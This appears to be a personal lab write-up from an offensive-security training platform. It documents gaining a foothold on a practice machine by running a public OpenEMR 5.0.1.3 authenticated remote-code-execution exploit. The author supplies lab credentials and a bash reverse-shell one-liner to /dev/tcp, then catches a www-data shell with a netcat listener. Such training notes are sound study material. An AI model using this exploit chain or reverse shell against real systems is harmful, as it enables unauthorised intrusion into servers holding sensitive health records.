InfoSec LAB

Apex_Exploitation

Created: 2 min read

RCE

The target OpenEMR instance has been identified to be obsolete and suffering from multiple critical vulnerabilities

I’ll be trying the RCE exploit targeting 5.0.1.3

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/apex]
└─$ searchsploit -m php/webapps/45161.py ; mv 45161.py openemr_rce.py
  Exploit: OpenEMR 5.0.1.3 - Remote Code Execution (Authenticated)
      URL: https://www.exploit-db.com/exploits/45161
     Path: /usr/share/exploitdb/exploits/php/webapps/45161.py
    Codes: N/A
 Verified: True
File Type: ASCII text
Copied to: /home/kali/PEN-200/PG_PRACTICE/apex/45161.py

It should work given the target instance is 5.0.1.1

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/apex]
└─$ python2 openemr_rce.py http://apex.offsec/openemr -u admin -p thedoctor -c 'bash -c "/bin/bash -i >& /dev/tcp/192.168.45.215/9999 0>&1"'
 .---.  ,---.  ,---.  .-. .-.,---.          ,---.    
/ .-. ) | .-.\ | .-'  |  \| || .-'  |\    /|| .-.\   
| | |(_)| |-' )| `-.  |   | || `-.  |(\  / || `-'/   
| | | | | |--' | .-'  | |\  || .-'  (_)\/  ||   (    
\ `-' / | |    |  `--.| | |)||  `--.| \  / || |\ \   
 )---'  /(     /( __.'/(  (_)/( __.'| |\/| ||_| \)\  
(_)    (__)   (__)   (__)   (__)    '-'  '-'    (__) 
                                                       
   ={   P R O J E C T    I N S E C U R I T Y   }=    
                                                       
         Twitter : @Insecurity                       
         Site    : insecurity.sh                     
 
[$] Authenticating with admin:thedoctor
[$] Injecting payload

Executing with the reverse shell payload

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/apex]
└─$ nnc 9999                      
listening on [any] 9999 ...
connect to [192.168.45.215] from (UNKNOWN) [192.168.196.145] 55688
bash: cannot set terminal process group (1324): Inappropriate ioctl for device
bash: no job control in this shell
www-data@APEX:/var/www/openemr/interface/main$ whoami
whoami
www-data
www-data@APEX:/var/www/openemr/interface/main$ hostname
hostname
APEX
www-data@APEX:/var/www/openemr/interface/main$ ifconfig
ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.196.145  netmask 255.255.255.0  broadcast 192.168.196.255
        ether 00:50:56:9e:b0:75  txqueuelen 1000  (Ethernet)
        RX packets 58138  bytes 7798019 (7.7 MB)
        RX errors 0  dropped 1987  overruns 0  frame 0
        TX packets 12462  bytes 6666983 (6.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1934  bytes 175190 (175.1 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1934  bytes 175190 (175.1 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial Foothold established to the target system as the www-data account via exploiting the target OpenEMR instance

Interactive Graph View

Backlinks